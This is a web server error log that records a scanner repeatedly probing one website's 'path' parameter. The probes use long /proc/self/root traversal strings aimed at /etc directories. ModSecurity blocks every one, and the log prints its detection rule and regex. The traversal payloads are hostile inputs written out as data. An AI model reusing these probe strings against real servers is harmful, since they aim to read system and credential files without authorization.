[Fri Mar 20 07:14:23.854494 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:37894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0d_vqxLDW4GITHUkTcBwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:25.660562 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:37902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eARCii7xarUs8iHZeUAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:28.059104 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:37910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eBDJ3M9BSuKP7CAYQxgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:29.451345 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:33938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eBfqxLDW4GITHUkTcCwAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:29.470165 2026] [mime_magic:error] [pid 26799:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:37472] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:14:30.763301 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:33950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eBhCii7xarUs8iHZeVgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:32.167184 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:33966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eCBCii7xarUs8iHZeWAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:33.527478 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:33982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eCda6ubjKNq_cu4bKXAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:34.968817 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:33996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eCvXLqtnMIWvjpaKQzQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:36.452704 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:34002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eDAF0L0L-SsrnPo5ezwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:38.859180 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:34014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eDl1pVZ5mVmJwsFMl9AAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:40.203007 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:51578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eEPqxLDW4GITHUkTcEgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:41.523050 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:51594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eETJ3M9BSuKP7CAYQ4wAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:42.873290 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.243.128:51604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eEjJ3M9BSuKP7CAYQ5QAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:44.192774 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:51612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eFDJ3M9BSuKP7CAYQ6AAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:45.476873 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:51616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eFTJ3M9BSuKP7CAYQ7wAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:46.727207 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:51622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eFvXLqtnMIWvjpaKQ1gAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:49.130888 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:51636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eGV1pVZ5mVmJwsFMl-wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:50.511011 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:47494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eGvHIg5MgXLBnicPvDQAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:51.855578 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:47510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eG_qxLDW4GITHUkTcHgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:53.660098 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:47516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eHQF0L0L-SsrnPo5e5gAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:14:54.117783 2026] [mime_magic:error] [pid 31215:tid 140411557287680] (70014)End of file found: [client 57.141.18.49:38892] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:14:55.513977 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:47532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eH_HIg5MgXLBnicPvEgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
